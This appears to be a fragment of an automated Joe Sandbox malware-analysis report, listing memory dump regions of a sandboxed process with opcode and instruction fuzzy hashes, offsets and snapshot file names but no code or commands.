                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 14571cc7032d0863cef2e9d6f4aecfe65b58404645de3e967aed0a610da2fc11
                                                                                                                                                  • Instruction ID: a2f62148d75169aaef561f221d21e6147d5a7500595f522890326c3b5fc329a1
                                                                                                                                                  • Opcode Fuzzy Hash: 14571cc7032d0863cef2e9d6f4aecfe65b58404645de3e967aed0a610da2fc11
                                                                                                                                                  • Instruction Fuzzy Hash: 8DB17674E10218CFDB54DFA9D994A9DBBB2FF89310F2081A9D819AB365DB30AD41CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d29e4a2d657dceac4bb4c78bc7c4ff43dd7a8b7a0dd1623e8a8a6730c6e69182
                                                                                                                                                  • Instruction ID: aac435017ac7cb9edec11de142f8b5bb61f86d6043dbbb93576fc257c5f84024
                                                                                                                                                  • Opcode Fuzzy Hash: d29e4a2d657dceac4bb4c78bc7c4ff43dd7a8b7a0dd1623e8a8a6730c6e69182
                                                                                                                                                  • Instruction Fuzzy Hash: 63512674D01208CFDB14DFA8C8947EDBBB2BB49302F608129E825BB295D775998ACF54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: af07066506843eeb32a84d500ee8e1555c853e39f98aed68c5f976308790d96f
                                                                                                                                                  • Instruction ID: 0fb4c90a780bb9b809ef8df97a22d8a455e6513338cd7685274d98ff43334393
                                                                                                                                                  • Opcode Fuzzy Hash: af07066506843eeb32a84d500ee8e1555c853e39f98aed68c5f976308790d96f
                                                                                                                                                  • Instruction Fuzzy Hash: A4514870D00208CFDB08DFA9C4947EDBBF2BB89302F648129D824BB294D775998ACF54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978620236.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_360b0000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 353815e867d62e79318283b976fe576d955e97760c3e5209a45f8d4931cc4447
                                                                                                                                                  • Instruction ID: 6a6c09c5f6057abd94cd8f528870b3c8b49c3b52a5cc5daffcedfd53c54eb945
                                                                                                                                                  • Opcode Fuzzy Hash: 353815e867d62e79318283b976fe576d955e97760c3e5209a45f8d4931cc4447
                                                                                                                                                  • Instruction Fuzzy Hash: 5251B274E046488FDB04CFAAD584A9DBFF2AF89310F2481AAD405AB365DB30A942CF11
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: dd6b5eff8f1029fe05a3ebb4433b3afe3aa3d3e4f1a3ea91487c4bb77babd817
                                                                                                                                                  • Instruction ID: 1cf393d3a37ce7ca6c897a8d9dbc35af37c9fc1eaf27778dc2062ea5b2331f7f
                                                                                                                                                  • Opcode Fuzzy Hash: dd6b5eff8f1029fe05a3ebb4433b3afe3aa3d3e4f1a3ea91487c4bb77babd817
                                                                                                                                                  • Instruction Fuzzy Hash: 8C51F474D01208CFDB14DFA8C4947EDBBB2FB49306F608129E825BB294D775998ACF54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978381801.0000000035E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35e90000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c40101e2d4f3cf4c96bb7c1449e5f6064c56798dc3da969010f0888755261625
                                                                                                                                                  • Instruction ID: 8dba75fb26fcc822e05582e633df4c5b8739bf7d91b6bb0eeb053f89b21d6784
                                                                                                                                                  • Opcode Fuzzy Hash: c40101e2d4f3cf4c96bb7c1449e5f6064c56798dc3da969010f0888755261625
                                                                                                                                                  • Instruction Fuzzy Hash: 6831BEB8D122199FDB04CFA4C194BAEBBF1AF89304F148499E400B7390D7399A40CF94
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978620236.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_360b0000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 46ba92de0faedd9d0c1ffac8834db866d212b3b1a67186990cc8ef821c834568
                                                                                                                                                  • Instruction ID: 7b4fa1d00494d0c8f4c0b13f257bd1e20d8f0a53286a23547a64716b085e1682
                                                                                                                                                  • Opcode Fuzzy Hash: 46ba92de0faedd9d0c1ffac8834db866d212b3b1a67186990cc8ef821c834568
                                                                                                                                                  • Instruction Fuzzy Hash: 64D09E34D1436CCBDF10DFA4E8513ADB772BB96315F0025E5941CBB200D7309E548E56
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: F$F$F$F
                                                                                                                                                  • API String ID: 0-1844600021
                                                                                                                                                  • Opcode ID: e41360ef40c7606c43d4eb20b803b4d57889b99336551432e042db34ec2c3927
                                                                                                                                                  • Instruction ID: 328fea65488f195361ac19e982e7a01a9f9d7e938609610df2e0d742959e0db7
                                                                                                                                                  • Opcode Fuzzy Hash: e41360ef40c7606c43d4eb20b803b4d57889b99336551432e042db34ec2c3927
                                                                                                                                                  • Instruction Fuzzy Hash: 9E41AF74A00349DFDB06EFB8C4417AEBBB2EF86304F1045A9D450AB252DB715D05CB91